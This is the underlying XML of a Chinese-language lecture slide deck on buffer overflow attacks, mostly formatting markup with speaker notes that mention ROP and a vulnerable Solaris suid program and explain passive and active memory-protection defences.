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59" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId79"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId80"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="1346" r:id="rId2"/>
    <p:sldId id="1816" r:id="rId3"/>
    <p:sldId id="1817" r:id="rId4"/>
    <p:sldId id="1818" r:id="rId5"/>
    <p:sldId id="1820" r:id="rId6"/>
    <p:sldId id="1821" r:id="rId7"/>
    <p:sldId id="1922" r:id="rId8"/>
    <p:sldId id="1824" r:id="rId9"/>
    <p:sldId id="1825" r:id="rId10"/>
    <p:sldId id="1826" r:id="rId11"/>
    <p:sldId id="1827" r:id="rId12"/>
    <p:sldId id="1829" r:id="rId13"/>
    <p:sldId id="1828" r:id="rId14"/>
    <p:sldId id="1974" r:id="rId15"/>
    <p:sldId id="1987" r:id="rId16"/>
    <p:sldId id="1988" r:id="rId17"/>
    <p:sldId id="2000" r:id="rId18"/>
    <p:sldId id="1880" r:id="rId19"/>
    <p:sldId id="2024" r:id="rId20"/>
    <p:sldId id="2025" r:id="rId21"/>
    <p:sldId id="2026" r:id="rId22"/>
    <p:sldId id="2027" r:id="rId23"/>
    <p:sldId id="2014" r:id="rId24"/>
    <p:sldId id="2015" r:id="rId25"/>
    <p:sldId id="2016" r:id="rId26"/>
    <p:sldId id="2017" r:id="rId27"/>
    <p:sldId id="1834" r:id="rId28"/>
    <p:sldId id="1835" r:id="rId29"/>
    <p:sldId id="1836" r:id="rId30"/>
    <p:sldId id="1837" r:id="rId31"/>
    <p:sldId id="2018" r:id="rId32"/>
    <p:sldId id="2019" r:id="rId33"/>
    <p:sldId id="2020" r:id="rId34"/>
    <p:sldId id="2021" r:id="rId35"/>
    <p:sldId id="2022" r:id="rId36"/>
    <p:sldId id="2023" r:id="rId37"/>
    <p:sldId id="2028" r:id="rId38"/>
    <p:sldId id="2029" r:id="rId39"/>
    <p:sldId id="2030" r:id="rId40"/>
    <p:sldId id="2031" r:id="rId41"/>
    <p:sldId id="2032" r:id="rId42"/>
    <p:sldId id="2033" r:id="rId43"/>
    <p:sldId id="2034" r:id="rId44"/>
    <p:sldId id="2035" r:id="rId45"/>
    <p:sldId id="2036" r:id="rId46"/>
    <p:sldId id="2037" r:id="rId47"/>
    <p:sldId id="2038" r:id="rId48"/>
    <p:sldId id="2039" r:id="rId49"/>
    <p:sldId id="2040" r:id="rId50"/>
    <p:sldId id="2041" r:id="rId51"/>
    <p:sldId id="2042" r:id="rId52"/>
    <p:sldId id="2043" r:id="rId53"/>
    <p:sldId id="2044" r:id="rId54"/>
    <p:sldId id="2045" r:id="rId55"/>
    <p:sldId id="2046" r:id="rId56"/>
    <p:sldId id="2047" r:id="rId57"/>
    <p:sldId id="2048" r:id="rId58"/>
    <p:sldId id="2049" r:id="rId59"/>
    <p:sldId id="2050" r:id="rId60"/>
    <p:sldId id="2051" r:id="rId61"/>
    <p:sldId id="2052" r:id="rId62"/>
    <p:sldId id="1882" r:id="rId63"/>
    <p:sldId id="1873" r:id="rId64"/>
    <p:sldId id="1923" r:id="rId65"/>
    <p:sldId id="1854" r:id="rId66"/>
    <p:sldId id="1855" r:id="rId67"/>
    <p:sldId id="1856" r:id="rId68"/>
    <p:sldId id="1857" r:id="rId69"/>
    <p:sldId id="1858" r:id="rId70"/>
    <p:sldId id="1859" r:id="rId71"/>
    <p:sldId id="1860" r:id="rId72"/>
    <p:sldId id="1861" r:id="rId73"/>
    <p:sldId id="2006" r:id="rId74"/>
    <p:sldId id="2003" r:id="rId75"/>
    <p:sldId id="2004" r:id="rId76"/>
    <p:sldId id="2005" r:id="rId77"/>
    <p:sldId id="2007" r:id="rId78"/>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b="1" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl5pPr>
    <a:lvl6pPr marL="2286000" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr kumimoji="1" b="1" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl6pPr>
    <a:lvl7pPr marL="2743200" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr kumimoji="1" b="1" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl7pPr>
    <a:lvl8pPr marL="3200400" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr kumimoji="1" b="1" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl8pPr>
    <a:lvl9pPr marL="3657600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr kumimoji="1"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ACA00"/>
    <a:srgbClr val="0000CC"/>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75368" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="86" d="100"/>
          <a:sy n="86" d="100"/>
        </p:scale>
        <p:origin x="23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502"/>
    </p:cViewPr>
  </p:sorterViewPr>
  <p:notesViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr>
        <p:scale>
          <a:sx n="100" d="100"/>
          <a:sy n="100" d="100"/>
        </p:scale>
        <p:origin x="-2832" y="2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3B4577F0-ED67-4FFE-A316-3B3AEC2EA4D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Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体"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charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{E46A9642-FD4A-45CC-9F4F-8E10AB9AB4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ROP(Return-Oriented Programming)</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16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="234752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堆栈图</a:t>
            </a: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29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="152284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如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Solaris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>下的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>fdformat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是个有缓冲区溢出漏洞的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>suid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>程序。</a:t>
            </a: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66</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2014596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baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>被动防护</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旨在保障内存中某些关键对象或性质完整性的防护技术</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在程序运行过程中</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>时刻验证监控某些性质是否得到满足或者某些状态值</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如栈中的返回地址或者</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>EBP)</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>是否没被修改</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>因为时刻在验证关键对象或性质的完整性</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当攻击出现时</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该技术可以被动地检测到有人尝试在修改</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="宋体" charset="-122"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>某些关键对象或者性质</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并在攻击的触发下做相应的防护处理</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因此称其为被动防护</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="宋体" charset="-122"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>主动防护</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旨在保障内存中某些关键对象</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性质的机密性</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可用性的防护技术</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攻击者要想实现攻击</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必</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>须对程序运行时的内存某些关键部分</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如</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>EBP </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>的内存具体位置</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布局情况了解</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而如果通过某些技术</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>手段保障了这些关键部分的机密性</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让攻击者无法顺利地得到其内存位置信息</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那么攻击者就很难攻</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>击成功</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另一方面</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本文的可用性是指可以更安全、可靠地使用</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例如更换动态链接库</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把所有的函数操</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>作换成更安全的函数操作</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当可用性得到保障时</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攻击者想要利用缓冲区溢出漏洞进行攻击就变得更</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>加困难</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该技术不是在攻击的触发下做相应的防护处理</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而是主动地保障关键对象</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性质的机密性</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可</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>用性</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在程序运行时已经对内存布局进行修改或者对函数使用做了替换</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提高了攻击者预测具体内存</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>信息的难度</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保障机密性</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或者无法利用不安全的函数</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>保障可用性</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="宋体"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pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>73</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42631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solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体"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pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2023/3/22</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CB3E5F7E-5148-4CB2-963A-95C37528F550}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2023/3/22</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F68ED92-367B-4CD8-A26C-4E6248EAD48D}"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E565DC17-A35B-464B-A9AB-82DCA891CFF2}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2023/3/22</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BA975A5-F217-4B48-B315-600F055D978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55650" y="228600"/>
            <a:ext cx="640715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43000"/>
            <a:ext cx="8229600" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429000" y="6597650"/>
            <a:ext cx="2133600" cy="263525"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{134E473F-4845-4315-9B13-28BC806CA207}"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4398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D01BC38-9BB6-424B-92AC-CCD3569A1070}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="57678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3EAD5F1-67B5-4A0D-ABC1-AB8E7ABAD35E}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2023/3/22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">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5EB7420-10C5-4439-A879-6C64816B7E2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8777064C-0A55-4E07-B965-6C3D3728ABB2}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2023/3/22</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B28E056-97FC-4A70-8131-E02F6583BF8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E8AED8A2-82FC-4DC1-9863-2A50613A6AE6}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2023/3/22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">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BBFD273C-C71A-40AC-9777-8B20B0D93BC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075295FB-9049-4B10-8132-A2704FC040E4}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2023/3/22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">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3782B63A-4FE1-4D96-8285-FCAE99EA789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7E94A6A-DBE8-4CE6-9619-41C62789DE7E}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2023/3/22</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B733275C-2774-4B25-97E7-7065F970E90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00651A7E-C721-4544-8D2F-3546C0565F84}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2023/3/22</a:t>
            </a:fld>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2C21E245-20D5-4D11-AD9A-5B593160C07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b="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{2812D72D-DA04-4C9C-9A6E-C01386CD88CE}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2023/3/22</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ea typeface="宋体" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{38C58080-A4A9-4607-B318-5D24794E2C9C}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:p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sz="2400" b="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ea typeface="宋体"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headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:sldLayoutIdLst>
    <p:sldLayoutId id="2147484660" r:id="rId1"/>
    <p:sldLayoutId id="2147484661" r:id="rId2"/>
    <p:sldLayoutId id="2147484662" r:id="rId3"/>
    <p:sldLayoutId id="2147484663" r:id="rId4"/>
    <p:sldLayoutId id="2147484664" r:id="rId5"/>
    <p:sldLayoutId id="2147484665" r:id="rId6"/>
    <p:sldLayoutId id="2147484666" r:id="rId7"/>
    <p:sldLayoutId id="2147484667" r:id="rId8"/>
    <p:sldLayoutId id="2147484668" r:id="rId9"/>
    <p:sldLayoutId id="2147484669" r:id="rId10"/>
    <p:sldLayoutId id="2147484670" r:id="rId11"/>
    <p:sldLayoutId id="2147484671" r:id="rId12"/>
    <p:sldLayoutId id="2147484672" r:id="rId13"/>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4" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="904875" y="1371600"/>
            <a:ext cx="6867525" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>第 十 章    缓冲区溢出攻击</a:t>
            </a:r>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2"/>
          <a:stretch>
